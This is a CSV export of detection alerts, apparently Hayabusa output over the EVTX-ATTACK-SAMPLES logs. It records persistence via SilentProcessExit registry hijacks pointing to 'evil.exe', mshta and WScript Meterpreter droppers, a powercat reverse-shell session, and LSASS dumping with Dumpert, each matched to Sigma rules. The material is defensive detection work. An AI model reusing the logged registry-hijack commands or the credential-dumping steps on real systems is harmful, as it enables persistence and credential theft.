Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 
ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: 
atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:15.054 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 
07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: 
C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx 
-2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: 
C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT 
AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 
0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump 
Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 
+09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
